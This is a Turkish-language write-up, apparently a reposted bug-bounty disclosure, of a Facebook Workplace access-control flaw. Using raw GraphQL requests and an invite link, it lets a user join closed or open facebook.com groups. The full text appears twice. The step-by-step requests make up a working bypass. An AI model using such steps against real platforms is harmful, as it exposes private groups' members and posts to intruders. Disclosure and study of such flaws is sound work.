Kapalı Veya Açık Gruplara Üye Olma
Bu bug; saldırganın, workplace platformunu kullanarak kendisini kapalı ve açık gruplara üye olarak eklemesini sağlar.
1- Workplace'ye gidiniz.
https://work.facebook.com/work/admin/user_sets/
2- İnsan set'i oluştur.
POST /api/graphql/ HTTP/1.1
Host: work.facebook.com
variables={input:{client_mutation_id:11",actor_id:actorid,name:myset-test,external_id:}}&doc_id=1801011926626947
3- Work ID'nizi oluşturulan set'e ekleyiniz.
POST /api/graphql/ HTTP/1.1
Host: work.facebook.com
variables={input:{client_mutation_id:12",actor_id:actorid,member_id:[work_profile_id],scim_company_group_id:[set_id_created]}}&doc_id=1690433404336349
4- Work profilinizi normal gruba ekleyiniz. (grup www.facebook.com'da değil)
POST /api/graphql/ HTTP/1.1
Host: work.facebook.com
variables={input:{client_mutation_id:14",actor_id:actorid,rule_id:[set_id_created],groups_ids:[normal_group]}}&doc_id=1798717653514339
* normal_group * : Normal grup, www.facebook.com'da oluşturulmuş kapalı veya açık bir gruba denir. (work placede olmayan)
-
Bu noktada, çalışma kullanıcısı yeni iletiler ve diğer şeylerin bildirimini alabilir.
Ama burayı ziyaret edince; https://work-id.facebook.com/groups/[normal_group] Şuraya yönlendirilirler;
https://www.facebook.com/groups/[normal_group] Kişisel profile. (grupta olmayan üye)
Çözüm: Work platformuna gruptan kişisel kullanıcı eklemeyi deniyelim.
Bu linki ziyaret edin;
https://work-id.m.facebook.com/groups/members/search/?group_id=[normal_group]
Bu davet linkini göreceksiniz.
https://fb.me/g/AAAAAAAAAA
Linke tıklayın ve gruba kişisel bir hesap gibi katılabilirsiniz. (grup üyelerini görebilme, ileti atabilme vs..)
Source(Orjinal): Click Me
Source2: Click Me
Bu bug; saldırganın, workplace platformunu kullanarak kendisini kapalı ve açık gruplara üye olarak eklemesini sağlar.
1- Workplace'ye gidiniz.
https://work.facebook.com/work/admin/user_sets/
2- İnsan set'i oluştur.
POST /api/graphql/ HTTP/1.1
Host: work.facebook.com
variables={input:{client_mutation_id:11",actor_id:actorid,name:myset-test,external_id:}}&doc_id=1801011926626947
3- Work ID'nizi oluşturulan set'e ekleyiniz.
POST /api/graphql/ HTTP/1.1
Host: work.facebook.com
variables={input:{client_mutation_id:12",actor_id:actorid,member_id:[work_profile_id],scim_company_group_id:[set_id_created]}}&doc_id=1690433404336349
4- Work profilinizi normal gruba ekleyiniz. (grup www.facebook.com'da değil)
POST /api/graphql/ HTTP/1.1
Host: work.facebook.com
variables={input:{client_mutation_id:14",actor_id:actorid,rule_id:[set_id_created],groups_ids:[normal_group]}}&doc_id=1798717653514339
* normal_group * : Normal grup, www.facebook.com'da oluşturulmuş kapalı veya açık bir gruba denir. (work placede olmayan)
-
Bu noktada, çalışma kullanıcısı yeni iletiler ve diğer şeylerin bildirimini alabilir.
Ama burayı ziyaret edince; https://work-id.facebook.com/groups/[normal_group] Şuraya yönlendirilirler;
https://www.facebook.com/groups/[normal_group] Kişisel profile. (grupta olmayan üye)
Çözüm: Work platformuna gruptan kişisel kullanıcı eklemeyi deniyelim.
Bu linki ziyaret edin;
https://work-id.m.facebook.com/groups/members/search/?group_id=[normal_group]
Bu davet linkini göreceksiniz.
https://fb.me/g/AAAAAAAAAA
Linke tıklayın ve gruba kişisel bir hesap gibi katılabilirsiniz. (grup üyelerini görebilme, ileti atabilme vs..)
Source(Orjinal): Click Me
Source2: Click Me
Son düzenleme: